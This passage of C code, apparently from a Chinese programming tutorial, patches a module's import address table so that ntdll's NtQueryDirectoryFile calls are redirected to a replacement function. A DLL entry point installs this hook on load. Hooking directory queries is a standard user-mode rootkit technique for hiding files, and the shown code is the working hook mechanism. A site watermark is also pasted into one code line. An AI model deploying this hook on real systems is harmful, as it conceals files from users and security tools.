|
ptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size==0)
{
return FALSE;
}
PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG)hModule+pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
PIMAGE_THUNK_DATA ThunkData;
while (ImportDescriptor->FirstThunk)
{
char* szDll = (char*)((ULONG)hModule+ImportDescriptor->Name);
//遍历寻找Kernel32中加载的ntdll.dll
if (stricmp(szDll,"ntdll.dll")!=NULL)
{
ImportDescriptor++;
continue;
}
ThunkData = (PIMAGE_THUNK_DATA)((ULONG)hModule+ImportDescriptor->OriginalFirstThunk);
int num = 1;
while (ThunkData->u1.Function)
{
char* szFunc = (char*)((ULONG)hModule+ThunkData->u1.AddressOfData+2);
if (stricmp(szFunc,"NtQueryDirectoryFile")==0)
{
PDWORD pFunc = (DWORD*)((ULONG)hModule+(DWORD)ImportDescriptor->FirstThunk)+(num-1);
if (flag)
{
//Hook
ULONG pNewFunc = (ULONG)NewZwQueryDirectoryFile;
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(*(ULONG*)pFunc);
DWORD dwWrite = 0;
WriteProcessMemory(GetCurrentProcess(),pFunc,&pNewFunc,sizeof(ULONG),&dwWrite);
}
else
{
//UnHook
DWORD dwWrite = 0;
WriteProcessMemory(GetCurrentProcess(),pFunc,(DWORD*)(&OldZwQueryDirectoryFile),sizeof(ULONG),&dwWrite);
}
return TRUE;
}
num++;
ThunkData++;
}
ImportDescriptor++;
}
return FALSE;
}
BOOL APIENTRY DllMain( HANDLE hModule,DWORD dwReason,LPVOID lpReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
//HOOK ZwQueryDirectroyFile
HookQueryFile(TRUE); www.2cto.com
}
else if (dwReason == DLL_PROCESS_DETACH)
{
//UnHook ZwQueryDirectoryFile
HookQueryFile(FALSE);
}
return TRUE;
} 作者:yincheng01
|